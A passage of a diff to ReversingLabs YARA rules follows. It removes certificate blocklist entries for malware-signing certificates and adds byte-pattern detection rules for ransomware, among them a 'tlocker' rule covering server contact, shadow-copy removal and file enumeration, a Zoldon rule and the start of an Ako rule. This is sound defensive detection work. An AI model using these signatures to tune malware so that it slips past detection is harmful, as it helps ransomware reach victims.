-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "2733cc5b-bc1f-5ba9-a2f4-50f472fc288e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2916-L2932"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bea94b9da8c176f22a66fe7a4545dcc3a38f727a75a0bc7920d9aece8e24b9b7"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$tlocker_ep = {
+          68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 05 E8 ?? ?? ?? ?? 33 C0 C3
+      }
+		$tlocker_contact_server_1 = {
+          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
+          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
+          8B 4D ?? 8D 55 ?? 52 6A ?? BB ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 2C 01 00 00 8B BE
+          ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? 68
+          ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 8D
+          4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 FF
+          15 ?? ?? ?? ?? 8B 45 ?? 57 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? ??
+          56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? ??
+          ?? 8B 3D ?? ?? ?? ?? 56 FF D7 EB 06 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+          ?? ?? ?? FF 15 ?? ?? ?? ?? 53 8B F0 FF D7 85 F6 74 06 8B 55 ?? 52 FF D7 8B 75 ?? 8B 0D ?? ?? ?? ?? 33 C0 83 7D ?? ?? 56
+          0F 94 C0 6A ?? 51 8B F8 FF 15 ?? ?? ?? ?? 85 FF 75 10 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 9E FE FF FF 5F 5E 5B 8B E5 5D
+          C3
+      }
+		$tlocker_contact_server_2_1 = {
+          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
+          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
+          8B 4D ?? 8D 55 ?? 52 6A ?? BF ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 E5 01 00 00 BF ??
+          ?? ?? ?? 39 3D ?? ?? ?? ?? 74 11 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B
+          9E ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ??
+          68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50
+          8D 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56
+          FF 15 ?? ?? ?? ?? 8B 45 ?? 53 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ??
+          ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ??
+          ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 EB 06 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 57 C7 45 ?? ?? ?? ?? ?? C7 45 ??
+      }
+		$tlocker_contact_server_2_2 = {
+          ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B D8 FF D6 85 DB 74 06 8B 55 ?? 52 FF D6 8B 75 ?? 33 C0 83 7D ?? ?? 0F 94 C0 8B F8 85
+          FF 74 18 8B 0D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB 5E 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 75
+          34 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B D1 41 89 0D ?? ?? ?? ?? 85 D2 7E 71 8B 0D ?? ?? ?? ?? 3B C1 73 08 8B C8 89 0D
+          ?? ?? ?? ?? 2B C1 3D ?? ?? ?? ?? 72 1C A1 ?? ?? ?? ?? 40 83 F8 ?? 7E 05 A1 ?? ?? ?? ?? 8B C8 A3 ?? ?? ?? ?? E8 ?? ?? ??
+          ?? 81 3D ?? ?? ?? ?? ?? ?? ?? ?? 75 0B 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 85
+          FF 75 17 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 E5 FD FF FF A3 ?? ?? ?? ?? EB BF 5F 5E 5B 8B E5 5D C3
+      }
+		$tlocker_get_server_data = {
+          55 8B EC 83 EC ?? 56 57 33 FF 57 57 8D 45 ?? 50 53 33 F6 FF 15 ?? ?? ?? ?? 85 C0 74 77 8D 49 ?? 8B 4D ?? 03 CF 85 F6 75
+          73 33 C0 85 C9 74 0F 8B 15 ?? ?? ?? ?? 51 50 52 FF 15 ?? ?? ?? ?? 33 C9 85 C0 0F 95 C1 8B F0 8B C1 85 C0 74 33 8B 55 ??
+          8D 4D ?? 51 52 8D 04 37 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 1C 8B 45 ?? 85 C0 74 ?? 6A ?? 6A ?? 8D 4D ?? 51 53 03 F8 FF 15
+          ?? ?? ?? ?? 85 C0 75 A0 85 F6 74 10 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 33 C0 5E 8B E5 5D C3
+      }
+		$tlocker_remove_shadow_copies = {
+          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 57 6A ?? 33 FF 57 50 FF 15 ?? ?? ?? ?? 8B D8
+          3B DF 0F 84 DC 00 00 00 56 8D B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+          68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 5E B8 ?? ?? ?? ?? 8B D3 2B D0 0F B7 08 66 89 0C
+          02 83 C0 ?? 66 3B CF 75 F1 6A ?? 8D 95 ?? ?? ?? ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+          51 8D 95 ?? ?? ?? ?? 52 57 68 ?? ?? ?? ?? 57 57 57 53 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 0F FF
+          15 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B F8 83 BD ?? ?? ?? ?? ?? 74 0B 8B B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53
+          6A ?? 50 FF 15 ?? ?? ?? ?? 5E 8B C7 5F 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 CD B8 ?? ?? ?? ?? 5B
+          E8 ?? ?? ?? ?? 8B E5 5D C3
+      }
+		$tlocker_find_files = {
+          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 0D ?? ?? ?? ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 F6 56 51
+          89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 AD 01 00 00 53 56 56 6A ?? 56 FF 15 ?? ?? ?? ??
+          85 C0 0F 88 89 01 00 00 68 ?? ?? ?? ?? 53 53 FF 15 ?? ?? ?? ?? 8B C3 8D 50 ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85
+          C9 75 F5 2B C2 D1 F8 8B F8 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 4D 01 00 00 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ??
+          ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 15 01 00 00 F6 85 ?? ?? ?? ?? ?? 0F 84 EC 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+          66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0
+          83 D8 ?? 85 C0 0F 84 AE 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66
+          3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 74 74 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF
+          66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 03 C7 8D 44 00 ?? 85 C0 74 6C 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
+          8B F0 85 F6 74 57 53 8D 4F ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 56 56 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ??
+          ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF
+          15 ?? ?? ?? ?? 85 C0 0F 85 EB FE FF FF 8B 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
+          ?? 8B 15 ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+      }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Reiner Wodey Informationssysteme" and pe.signatures [ i ] . serial == "77:e0:11:7e:8b:2b:8f:aa:84:be:d9:61:01:9d:5e:f8" and 1383695999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $tlocker_ep and $tlocker_get_server_data and $tlocker_remove_shadow_copies and $tlocker_find_files ) and ( $tlocker_contact_server_1 or ( $tlocker_contact_server_2_1 and $tlocker_contact_server_2_2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4F3Feb4Baf377Aea90A463C5Dee63884 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zoldon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zoldon ransomware."
 		author = "ReversingLabs"
-		id = "8de9bcf3-d705-590f-8898-52218f937571"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "5d28e6f0-9d6b-54f4-81ed-aadb58352c80"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2934-L2950"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zoldon.yara#L1-L107"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "56c37e758db33aa40e9a2c1c5a4eb14c2c370f614e838d86bf20c64f79e2a746"
+		logic_hash = "4821b8506e7ba00987978f2744da1c532e03d73f3275cb15e39cdf87f6018223"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zoldon"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F3D LIMITED" and pe.signatures [ i ] . serial == "4f:3f:eb:4b:af:37:7a:ea:90:a4:63:c5:de:e6:38:84" and 1526601599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_3D2580E89526F7852B570654Efd9A8Bf : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing LockerGoga ransomware."
-		author = "ReversingLabs"
-		id = "0514759c-2d10-5b29-aa2f-d16eb45b2816"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2952-L2968"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0f46fcfc8ee06756646899450daa254d3e5261bdc5c2339f20d01971608fff7b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$main_encrypt_function_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ??
+            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
+            64 89 20 E8 ?? ?? ?? ?? DD 5D ?? 9B 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? FF 75 ?? FF
+            75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? B2 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B1 ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            3C ?? 0F 85 ?? ?? ?? ?? B0 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            84 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6
+            80 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 C7 45
+        }
+		$main_encrypt_function_p2 = {
+            8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 83 7D
+            ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 FF 45 ?? 66 83 7D
+            ?? ?? 75 ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 33 C9 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
+            59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$write_zoldon_regkey = {
+            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 88 4D ?? 8B DA 8B F0 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8D 45 ?? 8B D3 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 84 DB
+            75 ?? 8D 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 89 45 ?? 80 7D ??
+            ?? 74 ?? 83 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 46 ?? 50 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
+            8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 ?? EB
+            ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 8B 46 ?? 50 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 50 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45
+            ?? 80 7D ?? ?? 74 ?? 83 7E ?? ?? 0F 95 C0 84 D8 74 ?? FF 76 ?? 68 ?? ?? ?? ?? FF 75
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33
+            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
+            89 45 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33
+            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45
+            ?? 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ??
+            ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
+            68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B
+        }
+		$find_files_p2 = {
+            8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ??
+            ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
+            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
+            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" and 1529888400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $write_zoldon_regkey ) and ( all of ( $find_files_p* ) ) and ( all of ( $main_encrypt_function_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fffe432A53Ff03B9223F88Be1B83D9D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing BabyShark malware."
+		description = "Yara rule that detects Ako ransomware."
 		author = "ReversingLabs"
-		id = "25a4c68b-5774-51a2-9aba-1326c85a5251"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "00d67696-998c-5bc3-95e7-0320ca558cdb"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2970-L2986"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ako.yara#L1-L152"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e7dbe6b95877f9473661ccf26fa6e5142147609adfe0a9bb8b493875325710af"
+		logic_hash = "488e9b528f75fcfaa8dd19859801e6e5a73575c33cd70c98ebaa9ae93025018b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ako"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EGIS Co., Ltd." and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" and 1498524050 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_832E161Aea5206D815F973E5A1Feb3E7 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing SeedLocker ransomware."
-		author = "ReversingLabs"
-		id = "ecaa250b-d4ac-5cc9-9e5e-5d6f45db18ad"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2988-L3006"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "da908de031c78aa012809988e44dea564d32b88b65a2010925c1af85d578a68a"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
